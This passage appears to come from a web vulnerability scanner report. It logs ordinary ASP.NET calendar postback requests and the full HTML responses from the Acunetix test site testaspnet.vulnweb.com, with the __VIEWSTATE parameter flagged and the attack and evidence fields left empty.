</div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1163 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,163 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8549&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgAAXaXXX9sIZGRkmMbfJd58XpzZX5HdVro6GolLsXY%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKL2arHDQK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy%2BPoBQLcy%2BPoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7%2F5DwLcy7%2F5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ%2Bg8CsdLZ%2Bg8CsdLNkQcCsdLNkQcCsdKh%2BQUCsdKh%2BQUCsdLVnQ0CsdLVnQ0CivmnBQKK%2BacFAor529kJAor529kJAor5z%2FwCAor5z%2FwCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v%2BAFAor5v%2BAFAor504QNAor504QNAor5h%2BwLAor5h%2BwLAor5u4MDAor5u4MDAr%2BT58QJAr%2BT58QJAr%2BTm5sBAr%2BTm5sBAr%2BTj74KAr%2BTj74KAr%2BTo9UDAr%2BTo9UDAr%2BT1%2BkMAr%2BT1%2BkMAr%2BTy4wEAr%2BTy4wEAr%2BT%2F6MNAr%2BT%2F6MNAr%2BTk8YGAr%2BTk8YGAr%2BTx68DAr%2BTx68DAr%2BT%2B8IMAr%2BT%2B8IMZIfhfRArJ1sWn%2Fa0ou9d4FiZZpU%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:57:03 GMT Content-Length: 12448
Response Body - size: 12,448 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgAAXaXXX9sIZGRkmMbfJd58XpzZX5HdVro6GolLsXY=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKL2arHDQK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy+PoBQLcy+PoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7/5DwLcy7/5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ+g8CsdLZ+g8CsdLNkQcCsdLNkQcCsdKh+QUCsdKh+QUCsdLVnQ0CsdLVnQ0CivmnBQKK+acFAor529kJAor529kJAor5z/wCAor5z/wCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v+AFAor5v+AFAor504QNAor504QNAor5h+wLAor5h+wLAor5u4MDAor5u4MDAr+T58QJAr+T58QJAr+Tm5sBAr+Tm5sBAr+Tj74KAr+Tj74KAr+To9UDAr+To9UDAr+T1+kMAr+T1+kMAr+Ty4wEAr+Ty4wEAr+T/6MNAr+T/6MNAr+Tk8YGAr+Tk8YGAr+Tx68DAr+Tx68DAr+T+8IMAr+T+8IMZIfhfRArJ1sWn/a0ou9d4FiZZpU=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:White" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8562')" style="color:Black" title="June 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8563')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8564')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8565')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8566')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8567')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8568')" style="color:Black" title="June 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8569')" style="color:Black" title="June 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8570')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8571')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8572')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8573')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8574')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8575')" style="color:Black" title="June 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1161 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,161 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8560&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgBA6Hd8aNsIZGRkdrg7BxkahfveHe3svnzPQWS1pbg%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKnsZbUDQK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy%2BPoBQLcy%2BPoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7%2F5DwLcy7%2F5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ%2Bg8CsdLZ%2Bg8CsdLNkQcCsdLNkQcCsdKh%2BQUCsdKh%2BQUCsdLVnQ0CsdLVnQ0CivmnBQKK%2BacFAor529kJAor529kJAor5z%2FwCAor5z%2FwCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v%2BAFAor5v%2BAFAor504QNAor504QNAor5h%2BwLAor5h%2BwLAor5u4MDAor5u4MDAr%2BT58QJAr%2BT58QJAr%2BTm5sBAr%2BTm5sBAr%2BTj74KAr%2BTj74KAr%2BTo9UDAr%2BTo9UDAr%2BT1%2BkMAr%2BT1%2BkMAr%2BTy4wEAr%2BTy4wEAr%2BT%2F6MNAr%2BT%2F6MNAr%2BTk8YGAr%2BTk8YGAr%2BTx68DAr%2BTx68DAr%2BT%2B8IMAr%2BT%2B8IMceskj4Hc9lxGfs7hBYftpsrqC88%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:28:26 GMT Content-Length: 12448
Response Body - size: 12,448 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgBA6Hd8aNsIZGRkdrg7BxkahfveHe3svnzPQWS1pbg=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKnsZbUDQK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy+PoBQLcy+PoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7/5DwLcy7/5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ+g8CsdLZ+g8CsdLNkQcCsdLNkQcCsdKh+QUCsdKh+QUCsdLVnQ0CsdLVnQ0CivmnBQKK+acFAor529kJAor529kJAor5z/wCAor5z/wCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v+AFAor5v+AFAor504QNAor504QNAor5h+wLAor5h+wLAor5u4MDAor5u4MDAr+T58QJAr+T58QJAr+Tm5sBAr+Tm5sBAr+Tj74KAr+Tj74KAr+To9UDAr+To9UDAr+T1+kMAr+T1+kMAr+Ty4wEAr+Ty4wEAr+T/6MNAr+T/6MNAr+Tk8YGAr+Tk8YGAr+Tx68DAr+Tx68DAr+T+8IMAr+T+8IMceskj4Hc9lxGfs7hBYftpsrqC88=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:White" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8562')" style="color:Black" title="June 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8563')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8564')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8565')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8566')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8567')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8568')" style="color:Black" title="June 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8569')" style="color:Black" title="June 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8570')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8571')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8572')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8573')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8574')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8575')" style="color:Black" title="June 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to 